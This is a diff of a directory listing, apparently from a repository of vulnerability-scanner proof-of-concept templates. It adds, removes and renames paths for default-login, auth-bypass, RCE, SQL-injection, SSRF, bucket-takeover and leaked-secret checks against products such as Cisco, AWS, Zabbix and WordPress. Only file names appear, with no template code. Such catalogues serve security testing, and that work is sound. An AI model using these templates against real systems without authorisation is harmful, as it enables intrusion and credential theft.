./poc/auth/splunk-login-10419.yaml @@ -3864,6 +3884,7 @@ ./poc/auth/square-oauth-secret.yaml ./poc/auth/squirrelmail-login-10519.yaml ./poc/auth/squirrelmail-login-10520.yaml +./poc/auth/squirrelmail-login-10521.yaml ./poc/auth/squirrelmail-login.yaml ./poc/auth/squirrelmail-vkeyboard-xss-10522.yaml ./poc/auth/sqwebmail-login-panel.yaml @@ -3877,10 +3898,10 @@ ./poc/auth/ssh-weak-public-key.yaml ./poc/auth/ssh-weakkey-exchange-algo.yaml ./poc/auth/ssrf-via-oauth-misconfig-10525.yaml -./poc/auth/ssrf-via-oauth-misconfig-10526.yaml ./poc/auth/ssrf-via-oauth-misconfig-10527.yaml ./poc/auth/stackhawk-api-key.yaml ./poc/auth/stackstorm-default-login-10529.yaml +./poc/auth/stackstorm-default-login-10530.yaml ./poc/auth/stackstorm-default-login.yaml ./poc/auth/stem-audio-table-private-keys-10533.yaml ./poc/auth/stem-audio-table-private-keys-10534.yaml @@ -3888,21 +3909,20 @@ ./poc/auth/stem-audio-table-private-keys.yaml ./poc/auth/steve-login-panel.yaml ./poc/auth/storm-unauthorized-access.yaml -./poc/auth/stripe-api-key(1).yaml +./poc/auth/stripe-api-key-11869.yaml ./poc/auth/stripe-api-key.yaml -./poc/auth/stripe-restricted-key-10553.yaml ./poc/auth/stripe-restricted-key-10554.yaml ./poc/auth/stripe-restricted-key-10555.yaml +./poc/auth/stripe-restricted-key.yaml ./poc/auth/stripe-secret-key-10556.yaml ./poc/auth/stripe-secret-key-10557.yaml -./poc/auth/stripe-secret-key.yaml -./poc/auth/submitty-login-10568.yaml +./poc/auth/stripe-secret-key-10558.yaml +./poc/auth/submitty-login-10567.yaml ./poc/auth/submitty-login.yaml ./poc/auth/subrion-login.yaml ./poc/auth/sunlogin.yaml ./poc/auth/sunlogin_RCE_CNVD-2022-10270.yaml ./poc/auth/supermicro-default-login-10572.yaml -./poc/auth/supermicro-default-login.yaml ./poc/auth/superset-default-login-10573.yaml ./poc/auth/superset-default-login-10574.yaml ./poc/auth/superset-default-login.yaml @@ -3910,19 +3930,18 @@ ./poc/auth/symantec-dlp-login-10597.yaml ./poc/auth/symantec-dlp-login-10598.yaml ./poc/auth/symantec-dlp-login.yaml -./poc/auth/symantec-epm-login-10599.yaml ./poc/auth/symantec-epm-login-10600.yaml ./poc/auth/symantec-epm-login-10601.yaml ./poc/auth/symantec-epm-login-10602.yaml ./poc/auth/symantec-epm-login.yaml -./poc/auth/symantec-ewep-login-10603.yaml ./poc/auth/symantec-ewep-login-10604.yaml ./poc/auth/symantec-ewep-login-10605.yaml +./poc/auth/symantec-ewep-login-10606.yaml ./poc/auth/symantec-ewep-login.yaml ./poc/auth/szhe-default-login-10635.yaml ./poc/auth/szhe-default-login-10636.yaml ./poc/auth/szhe-default-login-10637.yaml -./poc/auth/szhe-default-login-10638.yaml +./poc/auth/szhe-default-login.yaml ./poc/auth/szhe-default-password-10639.yaml ./poc/auth/szhe-default-password-10640.yaml ./poc/auth/szhe-default-password.yaml @@ -3930,6 +3949,7 @@ ./poc/auth/teamcity-login-panel.yaml ./poc/auth/teamtalk-login.yaml ./poc/auth/telecom-gateway-default-login-10686.yaml +./poc/auth/telecom-gateway-default-login.yaml ./poc/auth/telecom-gateway-default-password.yaml ./poc/auth/telecom-gateway-default-password.yml ./poc/auth/telegram-token.yaml @@ -3954,7 +3974,6 @@ ./poc/auth/tidb-native-password.yaml ./poc/auth/tidb-unauth-10770.yaml ./poc/auth/tidb-unauth-10771.yaml -./poc/auth/tidb-unauth-10772.yaml ./poc/auth/tingsboard-default-login.yaml ./poc/auth/tisson-system.yaml ./poc/auth/tlr-2005ksh-login.yaml @@ -3998,11 +4017,10 @@ ./poc/auth/trilithic-viewpoint-login-10838.yaml ./poc/auth/trilithic-viewpoint-login-10839.yaml ./poc/auth/trilithic-viewpoint-login-10840.yaml -./poc/auth/trilithic-viewpoint-login.yaml ./poc/auth/trunkey-icpsystem.yaml ./poc/auth/tufin-securetrack-login.yaml ./poc/auth/turnkey-openvpn.yaml -./poc/auth/twitter-secret(1).yaml +./poc/auth/twitter-secret-10862.yaml ./poc/auth/twitter-secret-11870.yaml ./poc/auth/twitter-secret.yaml ./poc/auth/two-factor-authentication-5ab7b9948af1b94d45fbf9a9614e1327.yaml @@ -4014,7 +4032,7 @@ ./poc/auth/ucmdb-default-login-10868.yaml ./poc/auth/ucmdb-default-login-10869.yaml ./poc/auth/ucmdb-default-login-10870.yaml -./poc/auth/ucmdb-default-login.yaml +./poc/auth/ucmdb-default-login-10871.yaml ./poc/auth/uk-cookie-consent-0bbba77520762097a09ab36a8d9ac90f.yaml ./poc/auth/uk-cookie-consent.yaml ./poc/auth/uk-cookie-d24507ac932285b70361a7e9dd308165.yaml @@ -4037,8 +4055,8 @@ ./poc/auth/unauth-message-read-10944.yaml ./poc/auth/unauth-message-read-10945.yaml ./poc/auth/unauth-message-read-10946.yaml -./poc/auth/unauth-message-read-10947.yaml ./poc/auth/unauth-message-read-2.yaml +./poc/auth/unauth-message-read.yaml ./poc/auth/unauth-opache-control-panel.yaml ./poc/auth/unauth-rlm-10960.yaml ./poc/auth/unauth-rlm.yaml @@ -4050,11 +4068,12 @@ ./poc/auth/unauth-temporal-web-ui.yaml ./poc/auth/unauth-wavink-panel-10966.yaml ./poc/auth/unauth-wavink-panel-10967.yaml -./poc/auth/unauth-xproxy-dashboard-10968.yaml +./poc/auth/unauth-xproxy-dashboard-10969.yaml ./poc/auth/unauth-xproxy-dashboard.yaml ./poc/auth/unauth-zwave-mqtt.yaml ./poc/auth/unauthen-elastic.yaml ./poc/auth/unauthen-kibana.yaml +./poc/auth/unauthenticated-airflow-10884.yaml ./poc/auth/unauthenticated-airflow-10885.yaml ./poc/auth/unauthenticated-airflow-10886.yaml ./poc/auth/unauthenticated-airflow-10887.yaml @@ -4063,14 +4082,14 @@ ./poc/auth/unauthenticated-alert-manager-10890.yaml ./poc/auth/unauthenticated-alert-manager-10891.yaml ./poc/auth/unauthenticated-alert-manager-10892.yaml -./poc/auth/unauthenticated-alert-manager.yaml ./poc/auth/unauthenticated-frp-10893.yaml ./poc/auth/unauthenticated-frp-10894.yaml -./poc/auth/unauthenticated-frp-10896.yaml +./poc/auth/unauthenticated-frp-10895.yaml ./poc/auth/unauthenticated-frp-10897.yaml ./poc/auth/unauthenticated-frp.yaml ./poc/auth/unauthenticated-glances-10898.yaml ./poc/auth/unauthenticated-glances-10899.yaml +./poc/auth/unauthenticated-glowroot-10900.yaml ./poc/auth/unauthenticated-glowroot-10901.yaml ./poc/auth/unauthenticated-glowroot-10902.yaml ./poc/auth/unauthenticated-influxdb.yaml @@ -4084,21 +4103,22 @@ ./poc/auth/unauthenticated-mongo-express-10908.yaml ./poc/auth/unauthenticated-mongo-express-10909.yaml ./poc/auth/unauthenticated-mongo-express-10910.yaml +./poc/auth/unauthenticated-mongo-express-10911.yaml ./poc/auth/unauthenticated-mongo-express-2.yaml ./poc/auth/unauthenticated-nacos-access-1.yaml +./poc/auth/unauthenticated-nacos-access-10912.yaml ./poc/auth/unauthenticated-nacos-access-10913.yaml ./poc/auth/unauthenticated-nacos-access-10914.yaml ./poc/auth/unauthenticated-nacos-access-2.yaml ./poc/auth/unauthenticated-nacos-access.yaml -./poc/auth/unauthenticated-netdata-10916.yaml ./poc/auth/unauthenticated-netdata-10917.yaml +./poc/auth/unauthenticated-netdata-10918.yaml ./poc/auth/unauthenticated-netdata.yaml ./poc/auth/unauthenticated-nginx-dashboard.yaml ./poc/auth/unauthenticated-popup-upload-10919.yaml ./poc/auth/unauthenticated-popup-upload-10920.yaml ./poc/auth/unauthenticated-popup-upload-10921.yaml -./poc/auth/unauthenticated-popup-upload-10923.yaml -./poc/auth/unauthenticated-prtg-10924.yaml +./poc/auth/unauthenticated-popup-upload-10922.yaml ./poc/auth/unauthenticated-prtg-10925.yaml ./poc/auth/unauthenticated-prtg-10926.yaml ./poc/auth/unauthenticated-prtg-10927.yaml @@ -4110,25 +4130,25 @@ ./poc/auth/unauthenticated-varnish-cache-purge-10932.yaml ./poc/auth/unauthenticated-varnish-cache-purge-10933.yaml ./poc/auth/unauthenticated-varnish-cache-purge-10934.yaml -./poc/auth/unauthenticated-zipkin-10936.yaml +./poc/auth/unauthenticated-zipkin-10935.yaml +./poc/auth/unauthenticated-zipkin.yaml ./poc/auth/unauthenticated-zippkin-10938.yaml ./poc/auth/unauthenticated-zippkin.yaml ./poc/auth/unauthorized-access-to-secret.yaml ./poc/auth/unauthorized-access.yaml ./poc/auth/unauthorized-brother-access-detect.yaml ./poc/auth/unauthorized-h3csecparh-login-10948.yaml -./poc/auth/unauthorized-h3csecparh-login-10949.yaml +./poc/auth/unauthorized-h3csecparh-login.yaml ./poc/auth/unauthorized-hp-officepro-printer-10950.yaml ./poc/auth/unauthorized-hp-officepro-printer.yaml +./poc/auth/unauthorized-hp-printer-10951.yaml ./poc/auth/unauthorized-hp-printer-10952.yaml -./poc/auth/unauthorized-hp-printer-10953.yaml -./poc/auth/unauthorized-hp-printer-10954.yaml ./poc/auth/unauthorized-hp-printer.yaml +./poc/auth/unauthorized-plastic-scm-10955.yaml ./poc/auth/unauthorized-plastic-scm-10956.yaml -./poc/auth/unauthorized-plastic-scm-10957.yaml ./poc/auth/unauthorized-plastic-scm.yaml ./poc/auth/unauthorized-printer-hp.yaml -./poc/auth/unauthorized-puppet-node-manager-detect-10958.yaml +./poc/auth/unauthorized-puppet-node-manager-detect-10959.yaml ./poc/auth/unauthorized-puppet-node-manager-detect.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10972.yaml ./poc/auth/unencrypted-bigip-ltm-cookie-10973.yaml @@ -4151,7 +4171,6 @@ ./poc/auth/versa-default-login-11002.yaml ./poc/auth/versa-default-login-11003.yaml ./poc/auth/versa-default-login-11004.yaml -./poc/auth/versa-default-login.yaml ./poc/auth/versa-default-password.yaml ./poc/auth/versa-director-login.yaml ./poc/auth/versa-flexvnf-ui-default-login.yaml @@ -4159,21 +4178,21 @@ ./poc/auth/vidyo-default-login-11010.yaml ./poc/auth/vidyo-login.yaml ./poc/auth/vigor-login-11020.yaml -./poc/auth/vigor-login-11021.yaml ./poc/auth/vigor-login-11022.yaml +./poc/auth/vigor-login-11023.yaml ./poc/auth/vigor-login-page-2000-series.yaml ./poc/auth/vigor-login-page.yaml ./poc/auth/vigor-login.yaml ./poc/auth/visionhub-default-credentials.yaml +./poc/auth/visionhub-default-login-11026.yaml ./poc/auth/visionhub-default-login-11027.yaml ./poc/auth/visionhub-default-login-11028.yaml -./poc/auth/visionhub-default-login-11029.yaml +./poc/auth/visionhub-default-login.yaml ./poc/auth/visual-footer-credit-remover-40c1f14bac0deb0ecd086748a7d4c541.yaml ./poc/auth/visual-footer-credit-remover.yaml ./poc/auth/vmware-hcx-login.yaml ./poc/auth/vmware-nsx-login.yaml ./poc/auth/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml -./poc/auth/vpms-auth-bypass-11066.yaml ./poc/auth/vpms-auth-bypass-11067.yaml ./poc/auth/vpms-auth-bypass-11068.yaml ./poc/auth/vpms-auth-bypass-11069.yaml @@ -4185,7 +4204,6 @@ ./poc/auth/wanhuOA-sqli-outMailLoginCheck.yaml ./poc/auth/watchguard-credentials-disclosure-11105.yaml ./poc/auth/watchguard-credentials-disclosure-11106.yaml -./poc/auth/watchguard-credentials-disclosure.yaml ./poc/auth/wayos-ac-centralized-management-system-default-weak-password.yaml ./poc/auth/wayos-default-password.yaml ./poc/auth/wazuh-default-login.yaml @@ -4204,7 +4222,6 @@ ./poc/auth/weblogic-weak-login-11154.yaml ./poc/auth/weblogic-weak-login-11155.yaml ./poc/auth/weblogic-weak-login-11156.yaml -./poc/auth/weblogic-weak-login.yaml ./poc/auth/webmethod-integration-default-login.yaml ./poc/auth/webroot-login.yaml ./poc/auth/webshell4-login-panel.yaml @@ -4216,9 +4233,11 @@ ./poc/auth/when-last-login.yaml ./poc/auth/whm-login-detect-11200.yaml ./poc/auth/whm-login-detect.yaml +./poc/auth/wifisky-default-login-11201.yaml ./poc/auth/wifisky-default-login-11202.yaml ./poc/auth/wifisky-default-login-11203.yaml ./poc/auth/wifisky-default-login-11204.yaml +./poc/auth/wifisky-default-login.yaml ./poc/auth/wifisky-default-password-11205.yaml ./poc/auth/wifisky-default-password-11206.yaml ./poc/auth/wifisky-default-password-cnvd-2021-39012.yml @@ -4251,6 +4270,7 @@ ./poc/auth/wordpress-updraftplus-pem-key-11327.yaml ./poc/auth/wordpress-updraftplus-pem-key.yaml ./poc/auth/wordpress-weak-credentials-11334.yaml +./poc/auth/wordpress-weak-credentials-11335.yaml ./poc/auth/wordpress-weak-credentials-11336.yaml ./poc/auth/wordpress-weak-credentials-11337.yaml ./poc/auth/wordpress-weak-credentials.yaml @@ -4375,16 +4395,18 @@ ./poc/auth/wps-limit-login.yaml ./poc/auth/wsdl-user-pwd-change.yaml ./poc/auth/wso2-default-login-11640.yaml -./poc/auth/wso2-default-login-11641.yaml ./poc/auth/wso2-default-login-11642.yaml ./poc/auth/wso2-default-login-11643.yaml +./poc/auth/wso2-default-login.yaml ./poc/auth/wso2-default-password.yaml ./poc/auth/xenforo-login-11670.yaml ./poc/auth/xenforo-login-11671.yaml ./poc/auth/xenforo-login-11672.yaml +./poc/auth/xenforo-login-11673.yaml +./poc/auth/xenforo-login-11674.yaml ./poc/auth/xenforo-login.yaml +./poc/auth/xenmobile-login-11675.yaml ./poc/auth/xenmobile-login-11676.yaml -./poc/auth/xenmobile-login-11677.yaml ./poc/auth/xenmobile-login.yaml ./poc/auth/xerox-workcentre7-default-password.yaml ./poc/auth/xerox7-default-login-11678.yaml @@ -4397,8 +4419,8 @@ ./poc/auth/xnat-login.yaml ./poc/auth/xvr-login-11702.yaml ./poc/auth/xvr-login-11703.yaml +./poc/auth/xvr-login-11704.yaml ./poc/auth/xvr-login-11705.yaml -./poc/auth/xvr-login-11706.yaml ./poc/auth/xvr-login.yaml ./poc/auth/xxljob-default-login-11709.yaml ./poc/auth/xxljob-default-login-11710.yaml @@ -4440,13 +4462,13 @@ ./poc/auth/zabbix-default-credentials.yaml ./poc/auth/zabbix-default-login-11760.yaml ./poc/auth/zabbix-default-login-11761.yaml -./poc/auth/zabbix-default-login-11762.yaml +./poc/auth/zabbix-default-login-11763.yaml ./poc/auth/zabbix-default-login.yaml ./poc/auth/zabbix-default-password.yaml ./poc/auth/zabbix-default-password.yml -./poc/auth/zabbix-server-login-11767.yaml ./poc/auth/zabbix-server-login-11768.yaml ./poc/auth/zabbix-server-login-11769.yaml +./poc/auth/zabbix-server-login-11770.yaml ./poc/auth/zabbix-server-login.yaml ./poc/auth/zapier-webhook-token-11771.yaml ./poc/auth/zenario-login-panel-11776.yaml @@ -4456,6 +4478,7 @@ ./poc/auth/zeroshell-login-11789.yaml ./poc/auth/zeroshell-login.yaml ./poc/auth/zhiyuan-oa-session-leak-11801.yaml +./poc/auth/zhiyuan-oa-session-leak-11802.yaml ./poc/auth/zhiyuan-oa-session-leak-11803.yaml ./poc/auth/zhiyuan-oa-session-leak-11804.yaml ./poc/auth/zhiyuan-oa-session-leak-11805.yaml @@ -4465,7 +4488,7 @@ ./poc/auth/zhiyuan-session-leakage.yaml ./poc/auth/zimbra-preauth-ssrf-11809.yaml ./poc/auth/zimbra-preauth-ssrf-11810.yaml -./poc/auth/zimbra-preauth-ssrf.yaml +./poc/auth/zimbra-preauth-ssrf-11811.yaml ./poc/auth/zimbra-web-login.yaml ./poc/auth/zipkin-unauth-11823.yaml ./poc/auth/zipkin-unauth.yaml @@ -4475,12 +4498,12 @@ ./poc/auth/zm-ajax-login-register.yaml ./poc/auth/zmanda-default-credential.yaml ./poc/auth/zmanda-default-login-11825.yaml +./poc/auth/zmanda-default-login-11826.yaml ./poc/auth/zmanda-default-login-11827.yaml ./poc/auth/zmanda-default-login-11828.yaml -./poc/auth/zmanda-default-login.yaml ./poc/auth/zms-auth-bypass-11829.yaml -./poc/auth/zms-auth-bypass-11830.yaml ./poc/auth/zms-auth-bypass-11831.yaml +./poc/auth/zms-auth-bypass-11832.yaml ./poc/auth/zms-auth-bypass.yaml ./poc/auth/zoho-webhook-token-11835.yaml ./poc/auth/zoho-webhook-token-11836.yaml @@ -4642,20 +4665,19 @@ ./poc/aws/amazon-auto-links-plugin.yaml ./poc/aws/amazon-auto-links.yaml ./poc/aws/amazon-docker-config-279.yaml -./poc/aws/amazon-docker-config-280.yaml -./poc/aws/amazon-docker-config-disclosure-278.yaml ./poc/aws/amazon-docker-config-disclosure.yaml +./poc/aws/amazon-docker-config.yaml ./poc/aws/amazon-ec2-ssrf.yaml ./poc/aws/amazon-einzeltitellinks-6c575ce7bdb8499dce4ce35ed88e8474.yaml ./poc/aws/amazon-einzeltitellinks.yaml ./poc/aws/amazon-link-5d8154f4ea4000f6c444ffb129902dae.yaml ./poc/aws/amazon-link.yaml -./poc/aws/amazon-mws-auth-token-11845.yaml ./poc/aws/amazon-mws-auth-token-281.yaml ./poc/aws/amazon-mws-auth-token-282.yaml ./poc/aws/amazon-mws-auth-token-283.yaml ./poc/aws/amazon-mws-auth-token-detect.yaml ./poc/aws/amazon-mws-auth-token-value.yaml +./poc/aws/amazon-mws-auth-token.yaml ./poc/aws/amazon-phish.yaml ./poc/aws/amazon-product-in-a-post-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/aws/amazon-product-in-a-post-plugin-d983383ac1f96dc90524e93ede3ac0bd.yaml @@ -4682,8 +4704,8 @@ ./poc/aws/arconix-faq-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/arconix-shortcodes-03fd7fbcfd3967eecec2212a351e2737.yaml ./poc/aws/armember-membership-76d089af6b78d98ec2c18a1732ae08c5.yaml +./poc/aws/aws-access-id-618.yaml ./poc/aws/aws-access-id-619.yaml -./poc/aws/aws-access-id-620.yaml ./poc/aws/aws-access-id.yaml ./poc/aws/aws-access-key-value-622.yaml ./poc/aws/aws-access-key-value-623.yaml @@ -4695,8 +4717,8 @@ ./poc/aws/aws-bucket-service-627.yaml ./poc/aws/aws-bucket-service-629.yaml ./poc/aws/aws-bucket-service.yaml +./poc/aws/aws-bucket-takeover-630.yaml ./poc/aws/aws-bucket-takeover-631.yaml -./poc/aws/aws-bucket-takeover-632.yaml ./poc/aws/aws-bucket-takeover.yaml ./poc/aws/aws-cdn-by-wpadmin-975bccdb766488fb23747f51954fe8b7.yaml ./poc/aws/aws-cdn-by-wpadmin.yaml @@ -4710,6 +4732,7 @@ ./poc/aws/aws-ec2-autoscale.yaml ./poc/aws/aws-ec2-sto.yaml ./poc/aws/aws-ec2.yaml +./poc/aws/aws-ecs-container-agent-tasks-640.yaml ./poc/aws/aws-ecs-container-agent-tasks-641.yaml ./poc/aws/aws-ecs-container-agent-tasks.yaml ./poc/aws/aws-elastic-beanstalk-detect-642.yaml @@ -4719,11 +4742,11 @@ ./poc/aws/aws-elastic-beanstalk.yaml ./poc/aws/aws-metadata.yaml ./poc/aws/aws-mfa-not-enabled.yaml +./poc/aws/aws-object-listing-645.yaml ./poc/aws/aws-object-listing-646.yaml ./poc/aws/aws-object-listing-647.yaml -./poc/aws/aws-object-listing-648.yaml ./poc/aws/aws-object-listing.yaml -./poc/aws/aws-opensearch-login-650.yaml +./poc/aws/aws-opensearch-login-649.yaml ./poc/aws/aws-opensearch-login.yaml ./poc/aws/aws-rds-cluster.yaml ./poc/aws/aws-redirect-651.yaml @@ -4740,6 +4763,7 @@ ./poc/aws/awstats-config-1.yaml ./poc/aws/awstats-config-2.yaml ./poc/aws/awstats-config-655.yaml +./poc/aws/awstats-config-656.yaml ./poc/aws/awstats-script-1.yaml ./poc/aws/awstats-script-2.yaml ./poc/aws/awstats-script-3.yaml @@ -4794,7 +4818,6 @@ ./poc/aws/easy-social-share-buttons3.yaml ./poc/aws/easy-testimonials-63219e4a52f76a6b0555468e9ceec2c8.yaml ./poc/aws/ec2-detection-7161.yaml -./poc/aws/ec2-detection-7162.yaml ./poc/aws/ec2-detection-7163.yaml ./poc/aws/ec2-instance-information.yaml ./poc/aws/edd-amazon-s3-0a9c584008d1e4514631aabcae93856c.yaml @@ -4840,6 +4863,7 @@ ./poc/aws/mail-queue-06f25c5572014fc70e8b5a0c3dec2a72.yaml ./poc/aws/maintenance-switch-49bc23ec2efb24f84aa43fa9d85e9e07.yaml ./poc/aws/mainwp-wordfence-extension-632c80981bd8b3a1683a5294cbec2a99.yaml +./poc/aws/metadata-aws-8810.yaml ./poc/aws/metadata-aws-8811.yaml ./poc/aws/metadata-aws-8812.yaml ./poc/aws/metadata-aws.yaml @@ -4883,9 +4907,9 @@ ./poc/aws/s3-detect-9962.yaml ./poc/aws/s3-detect-9963.yaml ./poc/aws/s3-detect-9964.yaml -./poc/aws/s3-detect-9965.yaml ./poc/aws/s3-detect.yaml ./poc/aws/s3-sensitive-api.yaml +./poc/aws/s3-subtakeover-9967.yaml ./poc/aws/s3-subtakeover-9968.yaml ./poc/aws/s3-subtakeover-9969.yaml ./poc/aws/s3-subtakeover.yaml @@ -5022,7 +5046,7 @@ ./poc/backup/Wordpress-newwpml_Plugins-DatabaseBackupDownload.yaml ./poc/backup/adb-backup-enabled-60.yaml ./poc/backup/adb-backup-enabled-61.yaml -./poc/backup/adb-backup-enabled-63.yaml +./poc/backup/adb-backup-enabled-62.yaml ./poc/backup/adb-backup-enabled.yaml ./poc/backup/android-manifest-allow-backup-enabled.yaml ./poc/backup/backup-1779dcc8f99f5a16ad298c353daf9d12.yaml @@ -5179,18 +5203,18 @@ ./poc/backup/php-backup-files-7.yaml ./poc/backup/php-backup-files-8.yaml ./poc/backup/php-backup-files-9.yaml -./poc/backup/php-backup-files-9497.yaml +./poc/backup/php-backup-files-9498.yaml ./poc/backup/php-backup-files.yaml ./poc/backup/phpmybackuppro.yaml ./poc/backup/recent-backups-aecbf28838f410f4e37aa987e88ec484.yaml ./poc/backup/recent-backups.yaml -./poc/backup/server-backup-login-10153.yaml ./poc/backup/server-backup-login-10154.yaml ./poc/backup/server-backup-login-10155.yaml +./poc/backup/server-backup-login-10156.yaml ./poc/backup/server-backup-login.yaml -./poc/backup/server-backup-manager-se-10157.yaml ./poc/backup/server-backup-manager-se-10158.yaml ./poc/backup/server-backup-manager-se-10159.yaml +./poc/backup/server-backup-manager-se-10160.yaml ./poc/backup/server-backup-manager-se-10161.yaml ./poc/backup/server-backup-manager-se-login-detect.yaml ./poc/backup/server-backup-manager-se.yaml @@ -5327,7 +5351,6 @@ ./poc/backup/zip-backup-files-1.yaml ./poc/backup/zip-backup-files-10.yaml ./poc/backup/zip-backup-files-11.yaml -./poc/backup/zip-backup-files-11815.yaml ./poc/backup/zip-backup-files-11816.yaml ./poc/backup/zip-backup-files-11817.yaml ./poc/backup/zip-backup-files-11818.yaml @@ -5360,34 +5383,36 @@ ./poc/cisco/cisco-acs.yaml ./poc/cisco/cisco-anyconnect-vpn.yaml ./poc/cisco/cisco-asa-honeypot-detection.yaml +./poc/cisco/cisco-asa-panel-932.yaml ./poc/cisco/cisco-asa-panel-933.yaml ./poc/cisco/cisco-asa-panel-934.yaml ./poc/cisco/cisco-asa-panel-935.yaml ./poc/cisco/cisco-asa-panel.yaml ./poc/cisco/cisco-asa-version.yaml ./poc/cisco/cisco-asa-workflow.yaml -./poc/cisco/cisco-cloudcenter-suite-rce.yaml +./poc/cisco/cisco-cloudcenter-suite-log4j-rce.yaml ./poc/cisco/cisco-cve-2020-3452-readfile.yml ./poc/cisco/cisco-edge-340-937.yaml ./poc/cisco/cisco-edge-340.yaml ./poc/cisco/cisco-expressway-panel.yaml ./poc/cisco/cisco-expressway.yaml -./poc/cisco/cisco-finesse-login-938.yaml ./poc/cisco/cisco-finesse-login-939.yaml +./poc/cisco/cisco-finesse-login-940.yaml ./poc/cisco/cisco-finesse-login.yaml ./poc/cisco/cisco-finger-detect.yaml ./poc/cisco/cisco-imc-supervisor.yaml +./poc/cisco/cisco-integrated-login-941.yaml ./poc/cisco/cisco-integrated-login-942.yaml -./poc/cisco/cisco-integrated-login-943.yaml ./poc/cisco/cisco-integrated-login.yaml ./poc/cisco/cisco-ios-xe-panel.yaml ./poc/cisco/cisco-iox.yaml ./poc/cisco/cisco-meeting-app.yaml +./poc/cisco/cisco-meraki-exposure-944.yaml ./poc/cisco/cisco-meraki-exposure-945.yaml -./poc/cisco/cisco-meraki-exposure-946.yaml ./poc/cisco/cisco-meraki-exposure.yaml ./poc/cisco/cisco-meraki-workflow.yaml ./poc/cisco/cisco-network-config-947.yaml +./poc/cisco/cisco-network-config-948.yaml ./poc/cisco/cisco-network-config-949.yaml ./poc/cisco/cisco-network-config-950.yaml ./poc/cisco/cisco-network-config-951.yaml @@ -5405,27 +5430,28 @@ ./poc/cisco/cisco-secure-cn.yaml ./poc/cisco/cisco-secure-desktop-960.yaml ./poc/cisco/cisco-secure-desktop-961.yaml -./poc/cisco/cisco-secure-desktop-962.yaml ./poc/cisco/cisco-secure-desktop.yaml ./poc/cisco/cisco-security-details-964.yaml ./poc/cisco/cisco-security-details.yaml ./poc/cisco/cisco-sendgrid-966.yaml ./poc/cisco/cisco-sendgrid-967.yaml ./poc/cisco/cisco-sendgrid-968.yaml +./poc/cisco/cisco-sendgrid-969.yaml ./poc/cisco/cisco-sendgrid.yaml ./poc/cisco/cisco-smi-exposure-970.yaml +./poc/cisco/cisco-smi-exposure-971.yaml ./poc/cisco/cisco-smi-exposure-972.yaml ./poc/cisco/cisco-ssl-vpn.yaml ./poc/cisco/cisco-systems-login-974.yaml ./poc/cisco/cisco-systems-login-975.yaml ./poc/cisco/cisco-systems-login.yaml +./poc/cisco/cisco-telepresence-976.yaml ./poc/cisco/cisco-telepresence-977.yaml -./poc/cisco/cisco-telepresence-978.yaml ./poc/cisco/cisco-telepresence.yaml ./poc/cisco/cisco-ucm.yaml ./poc/cisco/cisco-ucs-director-panel-detect.yaml ./poc/cisco/cisco-ucs-director.yaml -./poc/cisco/cisco-ucs-kvm-login-980.yaml +./poc/cisco/cisco-ucs-kvm-login-979.yaml ./poc/cisco/cisco-ucs-kvm-login.yaml ./poc/cisco/cisco-unity-express-panel-detect.yaml ./poc/cisco/cisco-unity-panel.yaml @@ -5442,9 +5468,9 @@ ./poc/coldfusion/adobe-coldfusion-detect-4.yaml ./poc/coldfusion/adobe-coldfusion-detect-5.yaml ./poc/coldfusion/adobe-coldfusion-detect-6.yaml -./poc/coldfusion/adobe-coldfusion-detect-82.yaml ./poc/coldfusion/adobe-coldfusion-detect-83.yaml ./poc/coldfusion/adobe-coldfusion-detect-84.yaml +./poc/coldfusion/adobe-coldfusion-detect.yaml ./poc/coldfusion/adobe-coldfusion-detector-1.yaml ./poc/coldfusion/adobe-coldfusion-detector-2.yaml ./poc/coldfusion/adobe-coldfusion-detector-3.yaml @@ -5455,7 +5481,7 @@ ./poc/coldfusion/adobe-coldfusion-error-detect-85.yaml ./poc/coldfusion/adobe-coldfusion-error-detect-86.yaml ./poc/coldfusion/adobe-coldfusion-error-detect-87.yaml -./poc/coldfusion/adobe-coldfusion-error-detect.yaml +./poc/coldfusion/adobe-coldfusion-error-detect-88.yaml ./poc/coldfusion/better-messages-wcfm-integration-6477bf18cad6c823db485408d49b337b.yaml ./poc/coldfusion/better-messages-wcfm-integration-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/coldfusion/better-messages-wcfm-integration.yaml @@ -5463,7 +5489,6 @@ ./poc/coldfusion/coldfusion-2f73f13842d918b6b1386a8c93903200.yaml ./poc/coldfusion/coldfusion-3caa015e9cc1bbc260607f4d03476581.yaml ./poc/coldfusion/coldfusion-administrator-login-1144.yaml -./poc/coldfusion/coldfusion-administrator-login-1145.yaml ./poc/coldfusion/coldfusion-administrator-login-1146.yaml ./poc/coldfusion/coldfusion-administrator-login-1147.yaml ./poc/coldfusion/coldfusion-administrator-login.yaml @@ -5471,9 +5496,9 @@ ./poc/coldfusion/coldfusion-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/coldfusion/coldfusion-debug-xss-1.yaml ./poc/coldfusion/coldfusion-debug-xss-1152.yaml +./poc/coldfusion/coldfusion-debug-xss-1153.yaml ./poc/coldfusion/coldfusion-debug-xss-1154.yaml ./poc/coldfusion/coldfusion-debug-xss-2.yaml -./poc/coldfusion/coldfusion-debug-xss.yaml ./poc/coldfusion/coldfusion-lucee-auth-bypass.yaml ./poc/coldfusion/coldfusion-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/coldfusion/coldfusion-theme.yaml @@ -5510,16 +5535,14 @@ ./poc/config/aerohive-netconfig-ui-199.yaml ./poc/config/aerohive-netconfig-ui-200.yaml ./poc/config/aerohive-netconfig-ui-201.yaml -./poc/config/aerohive-netconfig-ui.yaml ./poc/config/airflow-configuration-exposure-229.yaml -./poc/config/airflow-configuration-exposure-230.yaml +./poc/config/airflow-configuration-exposure.yaml ./poc/config/alibaba-canal-config-leak.yaml ./poc/config/amazon-docker-config-279.yaml -./poc/config/amazon-docker-config-280.yaml -./poc/config/amazon-docker-config-disclosure-278.yaml ./poc/config/amazon-docker-config-disclosure.yaml +./poc/config/amazon-docker-config.yaml ./poc/config/ansible-config-disclosure-325.yaml -./poc/config/ansible-config-disclosure.yaml +./poc/config/ansible-config-disclosure-326.yaml ./poc/config/apache-config-343.yaml ./poc/config/apache-config-exposure.yaml ./poc/config/apache-config-plain-password.yaml @@ -5527,34 +5550,36 @@ ./poc/config/apache-httpd-conf-disclosure.yaml ./poc/config/apache-httpd-conf-exposure.yml ./poc/config/api-iconfinder-438.yaml -./poc/config/api-iconfinder-439.yaml 